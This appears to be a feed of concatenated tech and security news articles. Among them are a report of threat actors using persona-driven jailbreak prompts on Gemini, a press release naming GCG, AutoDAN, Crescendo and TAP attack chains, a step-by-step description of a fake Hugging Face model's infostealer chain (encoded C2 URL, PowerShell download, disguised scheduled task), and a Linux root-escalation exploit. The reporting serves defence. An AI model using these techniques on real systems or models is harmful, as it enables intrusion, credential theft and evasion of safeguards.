The Agent Trust Protocol (ATP), authored by Lyrie’s research team and now open to the public at lyrie.ai/research, is a cryptographic standard that lets any system verify, in real time, what AI agent it is communicating with, what that agent is authorized to do, and whether the agent or its instructions have been tampered with.
The protocol covers five primitives:
Identity — who the AI agent is. Scope — what it is authorized to do. Attestation — whether it or its instructions have been tampered with. Delegation — who delegated authority. Revocation — whether that authority has been revoked. “Every AI agent on the internet today is a stranger. You don’t know who it is, what it’s authorized to do, or whether it’s been tampered with. ATP is the protocol that changes that.” — Guy Sheetrit, CEO and Founder of OTT Cybersecurity LLC, the company behind Lyrie.ai
ATP is open, royalty-free, and slated for submission to the Internet Engineering Task Force (IETF). The reference implementation is published under MIT license at github.com/OTT-Cybersecurity-LLC/lyrie-ai.
Acceptance into Anthropic’s Cyber Verification Program
OTT Cybersecurity LLC was accepted into Anthropic’s Cyber Verification Program (CVP), Anthropic’s framework for verifying legitimate dual-use cybersecurity operators. CVP acceptance supports Lyrie’s work around vulnerability research, offensive security tooling, and red-team workflows on Claude’s AI infrastructure, subject to Anthropic’s applicable safety and security policies.
Lyrie is also exploring similar verification pathways with other leading AI labs as part of its mission to build trusted security infrastructure for autonomous AI systems.
About Lyrie
Lyrie is an integrated offensive and defensive cybersecurity platform designed for the AI era. The platform includes:
lyrie hack — a single-command workflow that executes a seven-stage autonomous penetration test, producing proof-of-concept exploits alongside code-level remediation guidance. GPU-powered red teaming — adversarial testing workflows using GCG and AutoDAN on H200 GPU infrastructure, with support for Crescendo and TAP attack chains. OWASP ASI 2026 alignment — threat coverage mapped to the OWASP Agentic Security Initiative taxonomy. Omega-Suite binary analysis — autonomous workflows focused on zero-day vulnerability discovery within compiled software. Flexible deployment architecture — scalable across consumer-grade hardware and enterprise GPU clusters. Integrated security toolkit — nine built-in tools spanning reconnaissance, exploitation, and remediation capabilities within a unified agent environment. About OTT Cybersecurity LLC and Lyrie.ai
OTT Cybersecurity LLC, based in Dubai, United Arab Emirates, is the company behind Lyrie.ai, a security infrastructure platform built for the AI agent ecosystem. The company’s approach is rooted in the belief that effective cybersecurity solutions are developed by teams with real-world operational experience in high-risk and adversarial environments.
For more information: https://lyrie.ai | Research: https://lyrie.ai/research | GitHub: github.com/OTT-Cybersecurity-LLC/lyrie-ai
Contact
Guy Sheetrit
[email protected]
View the full article
Social network Reddit recently began blocking mobile visitors to its website while pushing them to download the official Reddit app, and it's fair to say that the move is not going down well with users.


If you visit reddit.com on your iPhone today, you may see a new popup that can't be dismissed, asking you to "get the app to keep using Reddit."

A Reddit spokesperson told Ars Technica that it was "a test for a small subset of frequent logged-out mobile users that prompts them to download the app after visiting the site." They continued: "These users are already familiar with Reddit and we've seen that the experience is much better for them in the app. The app offers a more personalized experience and users can more easily find communities that match their interests."

Users have since taken to subreddits like r/bugs and r/help to voice their displeasure at being blocked out of the website on mobile. "Are my days of anonymously browsing over?" asked one user.

Futurism's Victor Tangermann wrote about the aggressive ad last week, suggesting the change was the latest indication of the platform's "enshittification" – a neologism coined by author Cory Doctorow that describes tech companies deliberately degrading their services in order to maximize profit.

Despite consistent user growth and 121 million daily active users, Reddit has struggled to find a path to monetization since it went public on the stock exchange two years ago. The site's principal revenue is advertising, which explains the push to log users into its mobile app, where it can consistently track their activity.

In 2024, the company also signed a controversial contract with OpenAI that allowed the ChatGPT maker to train its AI models on user-submitted posts. (It's currently in legal battles with Perplexity and Anthropic over alleged unlawful use of its data.)

Over half the population of the U.S. visits Reddit each week, according to the Financial Times, but most of that discovery comes from Google searches, which suggests the so-called "front page of the internet" is walking a tightrope between monetizing interactions and stifling engagement growth.


It's not the first time Reddit has alienated some of its users. In 2023, it stopped letting users opt out of ad personalization. Then again in the same year, ahead of its IPO, the company started charging developers for accessing its API, which led to the shutdown of several popular Reddit clients, including Apollo. Tag: Reddit
This article, "Reddit Starts Blocking Mobile Website, Pushing Users to App Instead" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The Google Threat Intelligence Group (GTIG) today released evidence of a zero-day exploit developed by a cybercriminal group with the help of AI. It marks the first time the security research group has identified what it believes to be an AI-crafted zero-day exploit in the wild.
While evidence of threat actors using AI models for vulnerability research and discovery has existed for some time, instances of AI-generated zero-day exploits have proved rare or difficult to confirm.
“We observed prominent cyber crime threat actors partnering to plan a mass vulnerability exploitation operation,” GTIG researchers wrote in a new report about AI abuse by malicious attackers. “Our analysis of exploits associated with this campaign identified a zero-day vulnerability implemented in a Python script that enables the user to bypass two-factor authentication (2FA) on a popular open-source, web-based system administration tool.”
While GTIG hasn’t named the impacted tool, the team disclosed the vulnerability to the vendor and possibly hindered mass exploitation. Such incidents may become more common, however, as AI models’ reasoning capabilities are advancing to the point where they can discover high-level logic flaws rather than just basic memory corruption and improper input sanitization bugs.
This was the case with the discovered Python 2FA bypass exploit, which required credentials to exploit but stemmed from the tool’s developers hardcoding an ineffective trust assumption.
“Though frontier LLMs struggle to navigate complex enterprise authorization logic, they have an increasing ability to perform contextual reasoning, effectively reading the developer’s intent to correlate the 2FA enforcement logic with the contradictions of its hardcoded exceptions,” the GTIG researchers concluded. “This capability can allow models to surface dormant logic errors that appear functionally correct to traditional scanners but are strategically broken from a security perspective.”
GTIG has offered sufficient evidence to suggest that an AI model was used to both discover the vulnerability and write the exploit. For example, the Python script contains educational strings and a hallucinated CVSS score. The code also follows textbook Python programming elements that are consistent with LLM training data, but a human would not include in an exploit, such as detailed help menus and the clean _C ANSI color class.
Other evidence of AI-assisted vulnerability discovery
While the 2FA exploit was not developed using Google’s Gemini family of models, GTIG has discovered other instances where known threat actors have tried to abuse Gemini for exploit discovery. This is consistent with observations of other frontier AI labs like Anthropic and Open AI.
Google researchers recently observed a Chinese cyberespionage group it tracks as UNC2814 trying to bypass Gemini guardrails with prompts to direct the model to act as a security expert specialized in embedded devices.
The attackers tried to use such persona-driven jailbreak prompting to analyze the firmware of TP-Link and other embedded devices for vulnerabilities. Implementations of the Odette File Transfer Protocol (OFTP) were also targeted.
UNC2814 has targeted telecommunications and government entities from more than 42 countries since 2017. The group has a history of gaining initial access into networks by exploiting vulnerabilities in edge systems and web applications.
In a different AI abuse case, a North Korean state-linked threat group tracked as APT45 was observed sending thousands of prompts to Gemini with the goal of analyzing various known flaws or validating proof-of-concept exploits. The goal was likely to build a more robust arsenal of exploits for n-day vulnerabilities.
Attackers were also observed priming AI models with known vulnerability data to improve their accuracy in code analysis and to discover flaws that would otherwise be harder to detect. One example is a skill plug-in for Claude Code, Anthropic’s terminal-based agentic coding agent, that contains information distilled from 85,000 real-world vulnerability cases collected by Chinese bug bounty platform WooYun between 2010 and 2016.
“To facilitate these activities, actors are also experimenting with agentic tools such as OpenClaw and OneClaw alongside intentionally vulnerable testing environments,” the GTIG researchers wrote. “The use of these tools alongside vulnerability research suggests an interest in refining AI-generated payloads within controlled settings to increase exploit reliability prior to deployment.”
The GTIG report contains other examples of AI usage in the cyberattack lifecycle, including malware development and obfuscation, autonomous attack orchestration, infrastructure deployment, agentic workflows for generating deepfake content used in information campaigns, and more.
View the full article
A malicious Hugging Face repository posing as an OpenAI release delivered infostealer malware to Windows systems and logged 244,000 downloads before being removed, raising fresh concerns about how enterprises source and validate AI models from public repositories.
The repository, named Open-OSS/privacy-filter, impersonated OpenAI’s legitimate Privacy Filter release, copied its model card almost word-for-word, and included a malicious loader.py file that fetched and executed credential-stealing malware on Windows hosts, AI security firm HiddenLayer said in a research advisory.
“The repository reached the #1 trending position on Hugging Face with approximately 244K downloads and 667 likes in under 18 hours, numbers that were almost certainly artificially inflated to make the repository appear legitimate,” the advisory added.
The incident highlights growing concerns that public AI model registries are emerging as a new software supply-chain risk for enterprises, particularly as developers and data scientists increasingly clone open-source models directly into corporate environments with access to source code, cloud credentials, and internal systems.
The README accompanying the fake model diverged from the legitimate project in one key area, instructing users to run start.bat on Windows or execute python loader.py on Linux and macOS.
Researchers have previously found malicious code hidden inside Pickle-serialised model files on Hugging Face that bypassed the platform’s scanners. They have also warned that the AI supply chain is lagging behind traditional software in oversight and tooling.
Malicious loader disguised as a legitimate model setup
According to HiddenLayer, the loader.py script first executes decoy code that resembles a legitimate AI model loader before launching a concealed infection chain.
The script disabled SSL verification, decoded a base64-encoded URL linked to the public JSON hosting service jsonkeeper.com, retrieved a remote payload instruction, and passed commands to PowerShell. “Using jsonkeeper[.]com as the C2 channel lets the attacker rotate the payload without modifying the repository,” the researchers wrote.
The resulting PowerShell command downloaded an additional batch file from an attacker-controlled domain and established persistence by creating a scheduled task designed to mimic a legitimate Microsoft Edge update process.
The infection chain ultimately deployed a Rust-based infostealer targeting Chromium and Firefox-derived browsers, Discord local storage, cryptocurrency wallets, FileZilla configurations, and host system information, the advisory said.
The malware also attempted to disable Windows Antimalware Scan Interface and Event Tracing for Windows while checking for sandbox and virtual machine environments to evade analysis.
Part of a broader AI supply chain targeting
HiddenLayer, in its advisory, said that it identified six additional Hugging Face repositories uploaded under a separate account that used nearly identical loader logic and shared infrastructure with the campaign.
The researchers also linked elements of the operation to earlier software supply-chain attacks involving npm typosquatting campaigns and fake AI packages distributed through PyPI. The shared infrastructure “suggests these campaigns are possibly linked and likely part of a broader supply chain operation targeting open-source ecosystems,” HiddenLayer wrote.
The incident follows earlier warnings from researchers about malicious code embedded inside Pickle-serialized AI model files on Hugging Face, as well as separate campaigns involving poisoned AI SDKs and fake OpenClaw installers.
Traditional security controls are falling short
The incident also exposes limitations in existing software composition analysis and application security tooling when applied to AI artifacts, analysts said.
“Traditional SCA was designed to inspect dependency manifests, libraries, and container images, not the increasingly complex behaviors associated with AI development workflows,” said Sakshi Grover, senior research manager for cybersecurity services at IDC. “It is far less effective at identifying malicious loader logic concealed within seemingly legitimate AI repositories.”
Jaishiv Prakash, director analyst at Gartner, said enterprises now need dedicated governance controls at the AI registry layer itself.
“Enterprises must establish dedicated controls for model sources, approved versions, access, and runtime validation at the registry layer,” Prakash said, adding that model repositories distribute executable artifacts and embedded logic that often fall outside the effective scope of traditional SCA tools.
IDC’s November 2025 FutureScape report predicts that by 2027, 60% of enterprises deploying agentic AI systems will require an AI bill of materials to support continuous vulnerability scanning and compliance assurance, Grover said.
What should enterprises do now
HiddenLayer urged affected users to treat impacted systems as fully compromised and prioritize reimaging over cleanup efforts.
“If you cloned Open-OSS/privacy-filter and executed start.bat, python loader.py, or any file from the repository on a Windows host, treat the system as fully compromised,” the advisory said. Browser sessions should also be considered compromised even where passwords were not stored locally, the researchers added, because stolen session cookies can bypass multifactor authentication protections.
The company also recommended blocking listed indicators of compromise, rotating credentials, invalidating active sessions, and conducting historical network hunts for connections tied to the campaign.
Hugging Face confirmed to HiddenLayer that the repository violated its terms of service and removed it from the platform, according to the advisory.
View the full article
Apple hasn't fully abandoned the Vision Pro, but anyone hoping for a successor will be waiting at least two more years, according to Bloomberg's Mark Gurman.


Writing in his latest Power On newsletter, Gurman resisted suggestions that Apple has walked away from the headset entirely. The well-connected reporter says the company continues to develop new technologies and materials behind the scenes with the goal of eventually producing a cheaper, lighter enclosed headset. That said, no such product is apparently in active development, and the long-rumored "Vision Air" was canceled last year.

If a new Vision Pro-style device does materialize, Gurman says he wouldn't expect it for "around two more years at least," given that the bulk of Apple's mixed-reality hardware talent has been pulled onto other projects like lightweight smart glasses.

Indeed, Apple's smart glasses project is now the focus, and former Vision Products Group members have been reassigned to that team, as well as shoring up its Siri chatbot development, not to mention other AI wearables such as the AirPods with cameras and a planned AI pendant.

The Vision Pro's troubled retail launch was recently extensively covered in a book by New York Times labor reporter Noam Scheiber, who argues that Apple's decade-long erosion of its retail workforce directly contributed to the disappointing launch of the $3,499 headset.

Apple refreshed the Vision Pro in October 2025 with an updated model featuring an M5 chip.Related Roundup: Apple Vision ProTag: Mark GurmanBuyer's Guide: Vision Pro (Buy Now)Related Forum: Apple Vision Pro
This article, "Gurman: New Apple Vision Pro Won't Arrive for at Least Two Years" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
A newly disclosed Linux privilege escalation issue dubbed “Dirty Frag” is giving attackers a cleaner path to post-compromise escalation to root privileges.
According to Microsoft, a couple of vulnerabilities constituting the issue, affecting Linux kernel networking and memory-fragment handling components, are already seeing active exploitation in the wild. The exploitation attempts look indistinguishable from the recently disclosed  Copy Fail campaigns.
“Dirty Frag may be leveraged after initial compromise through SSH access, web-shell execution, container escape, or compromise of a low-privileged account,” Microsoft researchers said in a security blog post, adding that affected environments may include Ubuntu, RHEL, CentOS Stream, AlmaLinux, Fedora, openSUSE, and OpenShift deployments.
Microsoft also said the exploit stands out because it avoids many of the instability issues typically associated with Linux local privilege escalation exploits using race-condition dependent bugs.
Turning Linux memory fragmentation into root access
According to Microsoft, the Dirty Frag exploit chain abuses weaknesses in how the Linux kernel handles fragmented memory pages, allowing attackers to overwrite protected page-cache-backed data and escalate privileges to root access.
The attack combines two separate vulnerabilities affecting the Linux IPsec Encapsulating Security Payload (ESP) subsystem (CVE-2026-43284) and the RxRPC networking protocol (CVE-2026-43500). “Once local access is established, successful exploitation may allow attackers to escalate privileges to root and gain broad control over the affected Linux host,” the researchers said.
Dirty Frag is the latest addition to a growing family of Linux kernel page-cache corruption vulnerabilities that includes Dirty Pipe (CVE-2022-0847) and the recently disclosed Copy Fail (CVE-2026-31431) bug.
“This vulnerability is like both Copy Fail and Dirty Pipe in that they attack page caches in the system where in place crypto operations take place,” said Ben Ronallo, principal cybersecurity engineer at Black Duck. “Copy Fail, Dirty Pipe, and Dirty Frag are all exploiting the same root cause, but Dirty Frag is not limited to a single Linux subsystem, whereas Copy Fail is limited to only algif_aead and Dirty Pipe is limited to pipe_buffer.”
Attackers are already exploiting Dirty Frag
Microsoft warned that Dirty Frag is already being actively exploited in the wild, primarily as a post-compromise privilege escalation tool. The company said attackers are using the vulnerability after obtaining an initial foothold on vulnerable Linux systems, allowing them to elevate privileges from a low-level user account to full root access.
“Microsoft Defender is currently seeing limited in-the-wild activity where privilege escalation involving ‘su’ is observed, and which may be indicative of techniques associated with either ‘Dirty Frag’ or ‘Copy Fail,’” the researchers said, adding that the attack began with SSH access, followed by the execution of a malicious ELF binary that quickly escalated privileges using ‘su.’
Su, short for switch user, is a command-line tool in Linux systems to switch from the current user to another, typically root, to execute commands with elevated privileges.
Defenders urged to disable vulnerable kernel modules
Users don’t yet have a complete fix. While the Linux Kernel Organization patched CVE-2026-43284 in a release on May 8, 2026, fixes for CVE-2026-43500 are awaited.
With fixes still rolling out unevenly across Linux ecosystems, Microsoft and other researchers are urging organizations to apply temporary mitigations immediately. Recommended actions include disabling the vulnerable esp4, esp6, and rxrpc kernel modules if they are not operationally required.
Microsoft additionally recommended reducing unnecessary local shell access, monitoring abnormal privilege escalation, and strengthening containerized workload controls to reduce opportunities for attackers to escalate into full system compromise. “Mitigation alone may not reverse changes already introduced through successful exploitation attempts,” the researchers warned, adding that an exploitation prior to mitigation can persist malicious modifications in memory or cached file content.
View the full article
Apple is prioritizing larger batteries and more advanced health sensors over fingerprint authentication for the Apple Watch, according to a new claim from a prominent Chinese leaker.


In a new Weibo post, Instant Digital pushed back on recent speculation about biometric recognition coming to Apple's wearable lineup, claiming instead that the company remains content to let users unlock their devices via their paired iPhone.

Adding Touch ID sensors would introduce extra cost and eat into precious internal space that could otherwise be used for battery capacity, which is a tradeoff Apple apparently isn't willing to make at this stage, suggests the leaker.

Last August, MacRumors confirmed lines of code uncovered by Macworld that suggested Touch ID could arrive on the Apple Watch Series 12 or Apple Watch Ultra 4. That discovery led to suggestions that Apple could put the Touch ID sensor under the display or potentially integrate it into the side button, similar to its implementation on the iPad mini and iPad Air.

As things stand, the 2026 Apple Watch models are not expected to feature major design changes, and a design update is unlikely to happen until 2028 at the earliest. When it does, Apple could introduce noninvasive blood glucose monitoring technology, but currently the feature remains in the early stages of development.Related Roundups: Apple Watch 11, Apple Watch Ultra 3Tag: Instant DigitalBuyer's Guide: Apple Watch (Caution), Apple Watch Ultra (Neutral)Related Forum: Apple Watch
This article, "Next Apple Watch Models Unlikely to Add Touch ID, Focus on Battery Life" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The security industry is experiencing déjà vu, and most teams haven’t recognized it yet.
If you were in the trenches during the early 2000s, you remember the antivirus arms race. IT teams buried under signature updates. Configuration baselines checked obsessively. Patch cycles treated as the primary defense. Meanwhile, attackers pivoted. They wrote malware that matched no known signature and walked through the front door while the guards were checking outdated IDs.
The posture-first approach revealed its limitations as the endpoint attack surface exploded. The industry faced visibility gaps and realized you cannot harden what you cannot fully see. The posture-first approach wasn’t wrong. It was incomplete. As the endpoint attack surface exploded, the industry realized that you cannot harden what you cannot fully see. Limited visibility hindered effective hardening, driving the shift toward behavioral detection as an operational necessity.
AI security is at the beginning of that same arc. The teams that recognize it now get to skip the painful middle chapter.
The endpoint era’s hard-won lesson
The first generation of endpoint security asked answerable questions: Is antivirus installed? Are patches current? Does the configuration match the baseline? For a while, answering those questions felt like enough.
Then the surface expanded. Laptops left the perimeter. Zero-days made signatures irrelevant at the moment they mattered most. The industry responded by building tools that stopped asking “does this file look bad?” and started asking “what is this process actually doing?”.
That reframe changed everything. Instead of matching against lists of known bad, defenders began watching process trees, API call sequences, lateral movement patterns and privilege escalation chains. Behavior became the signal. Posture checks tell you what should be true. Behavioral detection tells you what is actually happening.
Most AI security is still at the posture phase
Look at where most organizations are with AI security today. Model cards, AI-specific SBOMs, input and output filters, prompt injection guardrails and access controls around model APIs. These are valuable controls, but they reflect a posture-based approach. To truly enhance security, organizations must recognize the importance of shifting to behavior-based strategies that monitor actual system actions.
They’re brittle in the same ways, too. The AI surface is expanding faster than any team can harden it: open-source LLMs deployed without procurement review, third-party AI APIs embedded inside SaaS tools, autonomous agents granted broad system access, RAG pipelines sitting on top of sensitive internal data. The phrase “shadow AI” exists for the same reason “shadow IT” did before it. People adopt capabilities faster than policy can follow.
The OWASP Top 10 for Agentic Applications 2026 is a welcome and necessary framework. But read it carefully and you’ll notice that most of its controls are posture-oriented: constrain scope, validate inputs, enforce least privilege. These are the right first steps, but they’re not a complete strategy. We know this because we’ve already lived through a version of this story.
The core tension is identical to what endpoint defenders faced two decades ago. You can’t patch your way out of a system you don’t fully control. With AI, the surface is more dynamic, more opaque and more deeply embedded in business logic than endpoints ever were. An AI agent doesn’t just sit on a device. It calls APIs, retrieves internal data, takes actions across systems and generates outputs that ripple downstream. The blast radius of a compromised or misbehaving agent is a problem entirely different from that of a compromised laptop.
Why behavioral detection becomes the lever
While you may not control every AI surface, monitoring what these systems actually do empowers your team to stay ahead of threats and feel capable in managing AI risks.
Behavioral signals are already being generated in environments that aren’t instrumented to catch them. This includes unusual data access patterns from a RAG pipeline, prompt injection artifacts surfacing in model outputs, unexpected tool calls from an agent operating outside its intended scope, token velocity anomalies pointing to automated abuse, and output drift that suggests something upstream has changed.
None of these is hypothetical. They’re observable today. The parallel to EDR is direct: just as endpoint behavioral tools watch process trees and API call chains, AI behavioral monitoring watches action sequences, what data was retrieved, what tools were invoked, what was generated and in what order. A single anomalous output is noise. A sequence of anomalous actions is worth investigating.
This is what gives SOC teams something to operate on. Posture is an audit checkpoint. Behavior gives you a triage queue. There’s a real difference between telling an analyst “This agent has broad permissions” and telling them, “This agent queried sensitive documents, formatted the output and initiated an outbound connection in a sequence it’s never run before.” The first is a finding. The second is an incident.
A concrete path forward
The endpoint era offers a practical sequence, not just a cautionary tale.
Don’t abandon posture work. It’s table stakes, not a strategy. Keep the model inventory current, enforce access controls and implement the OWASP guardrails. Just don’t let posture become the ceiling of your program.
Start logging AI system behavior now, even if you’re not fully analyzing it yet. Data debt compounds and having behavioral history is essential for future detection logic. Building a behavioral baseline early helps close gaps and prepares your organization for proactive AI security measures.
Prioritize your highest-agency surfaces first ー autonomous agents with broad system access, RAG pipelines connected to sensitive internal data, any LLM feature that faces external users or triggers downstream automations ー these are your highest-risk surfaces and the right place to start.
Think in sequences, not just single events. That’s the core lesson EDR already taught. An unusual API call is interesting, but an agent retrieving sensitive documents, formatting the output and making an unexpected outbound call forms a story. The sequence of actions provides the true signal for detection.
Finally, close the gap between your AI security program and your SOC. Most AI security work today sits inside the AI governance function or the data team. That’s the wrong home for behavioral detection. The SOC has the triage muscle, the incident response playbooks and the tool integrations. Getting AI behavioral telemetry in front of SOC analysts is partly a technology problem. It’s mostly an organizational one.
The signal is already there
The endpoint security story didn’t end badly. It matured. The teams that invested in behavioral telemetry before they needed it built programs that held up when the threat model shifted. Those that doubled down on static controls had to rebuild from scratch when reality caught up with them.
AI behavior is already generating signals in your environment. The question isn’t whether the shift from posture to behavioral detection will happen in AI security. It will, for the same reasons it happened at the endpoint. The question is whether your team will be ready to act on those signals when it counts.
The window is open. It won’t stay that way.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article
WhatsApp has started rolling out its paid WhatsApp Plus subscription to iOS, following beta testing of the new personalization-focused tier amongst a small group of users, reports WABetaInfo.


The plan is light on practical features, and is aimed more at heavier users who want to customize various aspects of the WhatsApp experience. It gives you access to premium sticker packs with fullscreen overlay animations (visible to recipients without the plan) and 18 accent colors that replace the app's default green across the interface. There are also 14 alternate app icons to choose from, ranging from minimal outlines to glittery and artistic designs.

The plan also raises the pinned-chat limit from 3 to 20, adds 10 new ringtones, and allows bulk theme, alert tone, and ringtone settings across chat lists.

The subscription costs €2.49 per month in Europe and $29 in Mexico, but that may not be reflective of the price in other regions. Eligible users may also see a one-week or one-month free trial, depending on the country. If you have a WhatsApp Business account, though, you won't see the subscription option -- it's for regular users only.

WhatsApp's core functionality remains changed, so users with no interest in the plan don't lose anything. Messaging, voice and video calls, status updates, and end-to-end encryption are still free for everyone. WhatsApp Plus is basically an optional add-on providing extras rather than restricting existing features.

The rollout is limited to a small group of iOS users on the latest App Store version, but broader availability is expected over the coming weeks. Tag: WhatsApp
This article, "WhatsApp Plus Lands on iPhone With Custom Themes, Icons, and More" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
At DXC Technology, global CISO Mike Baker has established one of the largest agentic security operation centers (SOCs) in the world. To upskill the workforce as part of this journey, he embedded experts from agentic SOC vendor 7AI within his security teams.
When Damon McDougald, global cybersecurity services lead at Accenture, wanted to retrain his team for agentic AI, the first thing he did was immerse himself in the technology. He signed up for an Anthropic boot camp, took courses to familiarize himself with the technology, then sent members of his team to take bootcamp classes as well.
John White, an early adopter of agentic AI when he was CISO at Virgin Atlantic, tells CSO that he purposely gave a new agentic AI tool to a junior staffer on his Virgin Atlantic team, provided the staffer with minimal direction, and told him to go off and play with the tool. “Within a couple of days, he was building his own workflows with no experience in the tooling at all,” says White, who recently moved from Virgin Atlantic to become field CISO at Torq.
While there are many paths to retraining security teams for agentic AI — from hands-on training to hands-off experimentation — there are several broad principles that CISOs should follow.
Embrace the agentic imperative
The first principle by which CISOs need to operate when it comes to future-proofing their SOCs is that agentic AI, the reality of which might not yet match expectations, will be an essential part of that transformation.
“Every security leader needs to start planning for an agentic future because our adversaries will be operating at machine speed and human-based processes, limited by our own biology, will not be able to scale to the needs of the future,” Baker tells CSO.
White adds, “The big risk is not adapting fast enough. Lots of CISOs are waiting until the perfect solution comes along or the platform that does everything. That itself introduces risk in the organization. Inaction is a risk.”
Chris Cochran, field CISO and vice president of AI security at the SANS Institute, tells CSO, “I just hosted a dinner with 30 security execs and half were self-described AI skeptics. The problem is that hesitation is a strategic liability. Adversaries are leveraging AI aggressively and continuously. Security teams that aren’t moving at the same pace are falling behind.”
Set the tone from the top
The second principle for reskilling security teams for agentic AI is all about leadership.
As Baker says, CISOs must set the tone. That means building a culture of rapid experimentation, iteration, and innovation. “Fail fast and move forward,” he says.
A key aspect of CISO leadership is understanding the needs of the business, Baker adds.
“The challenge of re-disciplining security teams and the executives that run those teams is highly dependent on their ability to lean into what the business needs, to become business enablers by embracing AI, and all that it has to offer,” he notes. “The bigger reskilling is security’s ability to run at the speed of business and enable the business to transform, leveraging AI in a safe and secure manner.”
Making the most of agentic AI for cybersecurity is as much a mindset change as it is a technological one, White adds.
“You have to articulate as a leader how things are going to change, and rewire the mindset to the fact that you don’t have to do everything yourself,” he explains. “The majority of execution is going to be done agentically, roles move into defining outcomes, designing workflows, being able to articulate intent through natural language, and having a bit of judgment around the outcomes.”
Respect resistance but work to overcome it
As with any technology shift, resistance to change needs to be addressed, particularly with a technology that threatens to usurp security roles — specifically level 1 and level 2 SOC analysts.
“There’s real cultural resistance in the security community. Some operators distrust AI outputs. Others don’t want to change workflows that have worked for years,” says Cochran.
He argues that agentic AI will actually create new roles: “What does emerge are genuinely new specializations: AI security (protecting AI systems from attacks), AI safety (ensuring that agents behave reliably and within boundaries), and AI governance.”
White says that at Virgin Atlantic “there was some nervousness to begin with; people think their roles will get taken by AI and that’s not the case.” That junior staffer who went off to experiment with the Torq tool came back and announced he wanted to change roles and become an automation workflow specialist. “It shows how quickly someone’s mindset can change,” White says.
“There is always somewhat of a resistance around change,” says DXC’s Baker. “We had to go through a growing process and a training process. But in a short amount of time people on the team have that ‘aha’ moment. We have been able to reskill our humans to different value-add tasks. We’re able to do amazing things with humans in terms of redeploying them; it’s almost like supercharging their careers.”
Get hands on and intentional
It’s critical that CISOs carve out time for overworked and overstressed security practitioners to play with agentic tools in a secure sandbox setting. DXC offers a playground called LabX, where security practitioners can experiment with agentic AI in a safe and governed manner, Baker says.
To help level up DXC staff, Baker also established an AI training track on the company’s learning management platform, encouraging cybersecurity staff to take time to not only experiment but also more formally develop their skills.
Accenture’s McDougald points out that Anthropic training courses offer their own sandbox environments where security pros can enter prompts, analyze responses, then refine and tune the agentic output.
He also advises CISOs to create formal training plans and free up security practitioners to ensure they have the time necessary to get their feet wet with the new technology.
Emphasize governance and humans in the loop
Agentic AI can do amazing things, but “practitioners need to understand that AI is non-deterministic. It can be wrong. It can drift. It can be unintentionally deceptive. That means training can’t just cover how to use AI; it also has to cover how AI can fail, and how to catch it when it does,” SANS’ Cochran says. “The core principle is: Give AI room to scale, but never fully remove the human.”
He recommends that security teams build escalation paths, define override authorities, establish audit trails, and create regular review cycles where humans evaluate agentic performance.
At DXC, Baker says that agents have taken over basic triage and investigation of alerts but there’s still a human at L3, who receives analysis from the AI agents. “We always have a human in the loop,” he says.
Similarly, Accenture’s McDougald says he has deployed agents at L1 and L2 but “it still has to be human-led.” Security professionals need to continually vet agentic outputs and provide feedback in an ongoing iterative process.
Rethink the cyber organization
In a SOC where L1 and L2 functions are agentic, organizational changes will necessarily occur. “You have to appreciate that this is an organizational change as much as a technology change,” says White.
Agentic AI will have an impact on “the way we design teams, the way we manage people, the way that roles evolve,” he says. The traditional career ladder of moving up the tiers no longer applies when entry-level roles are agentic. “New people coming to security are going to have to take a different route,” he notes.
White adds that traditional security teams have been divided into disciplines and silos, but “those roles now start to move around, merge, and become more of a holistic capability than a siloed one.”
Foster skills that optimize human-AI collaboration
The introduction of agentic systems will necessarily transform cyber’s skillset.
Josh Taylor, lead cybersecurity analyst at Fortra, says, “The SOC analyst’s job has always been about processing signals, triaging alerts, correlating events, escalation. Agentic AI doesn’t eliminate that work; it will relocate an analyst from inside the process to above it. The fundamental reskilling challenge won’t be as technical; it will be cognitive.”
He adds, “When an agent triages 200 alerts and presents five for human review, the analyst needs to assess whether the agent’s reasoning was sound. CISOs should invest in training that builds ‘model intuition,’ the ability to recognize when an agent’s output feels right but is structurally wrong.”
CISOs should also emphasize training that teaches analysts to set policies and define constraints on what agents are allowed or not allowed to do, such as block production traffic or send external communication, Taylor says. “SOC teams need to build decision boundaries the same way they build incident response playbooks.”
White adds, “The beauty of agentic AI is that all you need is a well-articulated statement of what you’re trying to achieve, and the agent will do the rest for you. This type of intent-driven, automated, AI-based engineering is available now.”
But humans need to evaluate whether the new workflow or process achieved the desired goal, deliver the value that was expected, and they need to understand how to go back to the agent, refine the prompts and achieve a more favorable outcome, he says.
Reimagine your operating model
With 120,000 end users, Baker understood that his security teams were buried in alerts, data, and telemetry. Today, his tier 1 and tier 2 SOC analyst roles are agentic, but the SOC is only the beginning. His roadmap includes agentic AI playing a role in vulnerability management, penetration testing, patching, and other security functions.
White’s roadmap takes a similar path. “I would imagine that we will be leveraging AI more and more.” His agentic priority list includes vulnerability management, pen testing, patching, and compliance.
White says the benefits of an agentic SOC extend beyond technology to the human side of security. “The best leaders will be ones who have evolved the target operating model. In doing so, it’s going to make you have a happier workforce. Your SOC is going to look like a calm place, not chaos with alerts going everywhere.”
View the full article
We find ourselves teetering upon a precipice of our own unwitting construction, and the vertiginous depth of our collective negligence ought to give every security practitioner profound pause.
In our headlong rush to deploy AI agents across enterprise environments, we have erected an infrastructure so thoroughly unfortified that it beggars belief. The Model Context Protocol, which Anthropic unveiled in November 2024 as the connective tissue binding large language models to external tools, has proliferated with breathtaking celerity. What has conspicuously failed to keep pace is any semblance of security discipline. The chasm between adoption velocity and security maturation grows more perilous with each passing deployment.
Knostic’s security researchers quantified the magnitude of our predicament last summer. Their methodical internet-wide reconnaissance unearthed 1,862 MCP servers nakedly exposed to public access. When they manually verified a sample of 119 instances, the results defied credulity: every single server permitted unauthenticated access to internal tool listings. Not a preponderance. Not ninety percent. The entirety. Organizations are effectively broadcasting comprehensive inventories of their AI capabilities to anyone sufficiently perspicacious to enumerate them, without demanding so much as a perfunctory password challenge.
The implications penetrate far deeper than mere exposure statistics intimate. These are not dormant test servers or derelict development instances languishing in forgotten corners of corporate infrastructure. Knostic’s forensic analysis revealed production systems with write access to financial databases, social media accounts, and customer relationship management platforms. Enterprises have tethered their most consequential operational capabilities to AI agents and subsequently neglected to secure the ingress. The insouciance is breathtaking.
A catalogue of catastrophe
The theoretical has transmuted into the operational with dispiriting alacrity.
